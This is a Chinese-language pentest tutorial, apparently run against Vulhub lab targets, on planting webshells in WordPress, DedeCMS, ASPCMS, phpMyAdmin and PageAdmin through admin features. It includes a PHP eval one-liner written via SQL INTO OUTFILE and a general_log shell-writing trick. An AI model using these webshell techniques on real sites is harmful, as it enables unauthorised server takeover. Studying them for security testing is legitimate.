常见的cms漏洞

目录

WordPress

DedeCMS

ASPCMS

PHPMyadmin

pageadmin

WordPress

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。截至2018年4月，排名前1000万的网站中超过30.6%使用WordPress。WordPress是最受欢迎的网站内容管理系统。全球有大约30%的网站(7亿5000个)都是使用WordPress架设网站的。WordPress:是目前因特网上最流行的博客系统。WordPress在最著名的网络发布阶段中脱颖而出。如今，它被使用在超过7000万个站点上。

姿势一：后台修改模板拿WebShell

1、进入Vulhub靶场并执行以下命令开启靶场；在浏览器中访问并安装好

2、修改其WP的模板写入一句话木马后门并访问其文件即可GetShell;:登陆WP后点击【外

观】-》【编辑】--》404.php

3、访问链接

http://192.168.3.70:8093//wp-content/themes/twentyfifteen/404.php

4、使用中国菜刀连接

姿势二：上传主题拿WebShell

1、接着上一个环境使用，将带有后门的文件加入到主题中并将主题压缩为ZP文件点击【外观】-》【主题】--》【添加】--》【上传主题】--》【浏览】--》【现在安装】

2、在主题里写一句话木马

3、拼接/wp-content/themes/cx-multi/404.php后访问，使用中国菜刀连接

DedeCMS

DedeCMS是织梦团队开发PHP网站管理系统，它以简单、易用、高效为特色，组建出各种各样各具特色的网站，如地方门户、行业门户、政府及企事业站点等。

姿势一：通过文件管理器上传WebShell

1、访问目标靶场其思路为dedecms后台可以直接上传任意文件，可以通过文件管理器上传php文件获取webshell

2、登陆到后台点击【核心】一》【文件式管理器】一一》【文件上传】将准备好的一句话代

码上传OK

3、使用菜刀连接

姿势二：修改模板文件拿WebShell

1、与WPCMS类似，直接修改模板拿WebShell..点击【模板】--》【默认模板管理】一》【index.htm】---》【修改】在文件修改中添加一句话代码如下

2、点击【生成】--》【更新主页HTML】--》将主页位置修改为【.·/index.php】--》点击【生成静态】--》点击【更新主页】再次访问站点首页可发现变化

3、访问测试

4、使用中国菜刀连接

姿势三：后台任意命令执行拿WebShell

1、点击【模块】-》【广告管理】-一》【增加一个新广告】一》在【广告内容】处添加一句话代码--》点击【确定】

2、点击【代码】-一》在图中显示的路径与站点进行拼接访问测试！

3、访问测试

4、使用中国菜刀连接

姿势四：SQL命令执行拿WebShell

1、使用sql语句select " " into outfile " "

2、访问：http:192.168.3.179/6.php并使用中国菜刀连接

ASPCMS

ASPCMS是由上谷网络开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。

姿势一：后台修改配置文件拿Shell

1、访问并登录后台

2、点击【扩展功能】-》【幻灯片设置】--》点击【保存】--》开启代理进行抓包

3、在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包查看被修改的asp

文件内容

4、使用中国菜刀连接

PHPMyadmin

姿势一：通过日志文件拿Shell

利用mysql日志文件写shell,,这个日志可以在mysql里改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell

1、登录phpmyadmin

2、set global general_log='on';

3、SQL写入一句话木马到mafa.php

4、使用中国菜刀连接

姿势二：导入导出拿WebShell

1、获悉路径：E:\phpstudy_pro\Extensions\MySQL5.7.26\data\

2、SQL写入 select "<?php eval($_POST[a]);?>" into outfile 'E:/phpstudy_pro/www/b.php';

3、使用中国菜刀连接

姿势三：界面图像化GetShell

1、搜索关键字

2、SQL写入一句话木马

3、使用中国菜刀连接

pageadmin

PageAdmin CMS系统是基于.Net的网站管理系统，安全、稳定、灵活，全国用户超过百万，致力于为企业、学校、政府网站建设和网站制作提供企业级内容管理系统解决方案。

姿势一：上传模块拿WebShell

1、访问pageadmin在后台可以上传模板，把webshell打包成zip上传模板，系统会自动解压，成功会在后台存在后门，访问即可获取webshell。点击【应用】-》【插件安装】--》【上传文件】

2、使用哥斯拉连接